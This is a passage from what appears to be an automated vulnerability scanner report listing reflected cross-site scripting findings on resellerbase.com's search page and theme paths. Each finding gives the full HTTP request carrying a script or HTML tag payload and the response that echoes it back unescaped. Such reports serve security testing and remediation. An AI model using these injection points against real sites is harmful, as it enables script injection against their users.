Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 213b9<a>049b7db85d4 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search213b9<a>049b7db85d4&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search213b9<a>049b7db85d4&opt=2 was not found on this server.</p>
...[SNIP]...

2.1486. http://www.resellerbase.com/detail/18/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload c807c<a>0618a88d04a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...c807c<a>0618a88d04a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...c807c<a>0618a88d04a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1487. http://www.resellerbase.com/detail/18/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6da70<script>alert(1)</script>b5622afee88 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2&6da70<script>alert(1)</script>b5622afee88=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search&opt=2&6da70<script>alert(1)</script>b5622afee88=1 was not found on this server.</p>
...[SNIP]...

2.1488. http://www.resellerbase.com/detail/18/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/18/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ec7b2<a>b59bb3b5bf1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/18/search.php?keyword=search...&Submit3=Search&opt=2ec7b2<a>b59bb3b5bf1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/18/worlddatingpartners-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/search.php?keyword=search...&Submit3=Search&opt=2ec7b2<a>b59bb3b5bf1 was not found on this server.</p>
...[SNIP]...

2.1489. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 92290<script>alert(1)</script>49e6c1a1682 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail92290<script>alert(1)</script>49e6c1a1682/18/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail92290<script>alert(1)</script>49e6c1a1682/18/themes/ was not found on this server.</p>
...[SNIP]...

2.1490. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 92787<script>alert(1)</script>c89ee821ea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1892787<script>alert(1)</script>c89ee821ea0/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1892787<script>alert(1)</script>c89ee821ea0/themes/ was not found on this server.</p>
...[SNIP]...

2.1491. http://www.resellerbase.com/detail/18/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d3c98<script>alert(1)</script>b5ae50dcd4a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesd3c98<script>alert(1)</script>b5ae50dcd4a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesd3c98<script>alert(1)</script>b5ae50dcd4a/ was not found on this server.</p>
...[SNIP]...

2.1492. http://www.resellerbase.com/detail/18/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2aa65<script>alert(1)</script>a9e91817d38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/?2aa65<script>alert(1)</script>a9e91817d38=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/?2aa65<script>alert(1)</script>a9e91817d38=1 was not found on this server.</p>
...[SNIP]...

2.1493. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4bf6d<script>alert(1)</script>e3f47e89fb0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4bf6d<script>alert(1)</script>e3f47e89fb0/18/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4bf6d<script>alert(1)</script>e3f47e89fb0/18/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1494. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a48cd<script>alert(1)</script>a1d87a5f690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18a48cd<script>alert(1)</script>a1d87a5f690/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18a48cd<script>alert(1)</script>a1d87a5f690/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1495. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd705<script>alert(1)</script>ed002553f0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themesdd705<script>alert(1)</script>ed002553f0/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themesdd705<script>alert(1)</script>ed002553f0/kosmos/ was not found on this server.</p>
...[SNIP]...

2.1496. http://www.resellerbase.com/detail/18/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fe1cc<script>alert(1)</script>fc5bb89d2de was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosfe1cc<script>alert(1)</script>fc5bb89d2de/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosfe1cc<script>alert(1)</script>fc5bb89d2de/ was not found on this server.</p>
...[SNIP]...

2.1497. http://www.resellerbase.com/detail/18/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46359<script>alert(1)</script>4eb4e624261 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/?46359<script>alert(1)</script>4eb4e624261=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/?46359<script>alert(1)</script>4eb4e624261=1 was not found on this server.</p>
...[SNIP]...

2.1498. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f8b8d<script>alert(1)</script>f5af6ff28b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailf8b8d<script>alert(1)</script>f5af6ff28b6/18/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.1499. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3871f<script>alert(1)</script>2b8d9355873 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/183871f<script>alert(1)</script>2b8d9355873/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/183871f<script>alert(1)</script>2b8d9355873/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1500. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 53335<script>alert(1)</script>1d01ce684d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes53335<script>alert(1)</script>1d01ce684d8/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes53335<script>alert(1)</script>1d01ce684d8/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.1501. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d5c17<script>alert(1)</script>f59b4112ee9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmosd5c17<script>alert(1)</script>f59b4112ee9/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmosd5c17<script>alert(1)</script>f59b4112ee9/images/ was not found on this server.</p>
...[SNIP]...

2.1502. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 56622<script>alert(1)</script>a3d818fb5bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images56622<script>alert(1)</script>a3d818fb5bd/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images56622<script>alert(1)</script>a3d818fb5bd/ was not found on this server.</p>
...[SNIP]...

2.1503. http://www.resellerbase.com/detail/18/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f37db<script>alert(1)</script>daade4a7e1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/18/themes/kosmos/images/?f37db<script>alert(1)</script>daade4a7e1=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/18/themes/kosmos/images/?f37db<script>alert(1)</script>daade4a7e1=1 was not found on this server.</p>
...[SNIP]...

2.1504. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6d4d<script>alert(1)</script>90ac14b037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild6d4d<script>alert(1)</script>90ac14b037d/18/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild6d4d<script>alert(1)</script>90ac14b037d/18/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.1505. http://www.resellerbase.com/detail/18/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/18/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6088c<script>alert(1)</script>99663b3f148 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

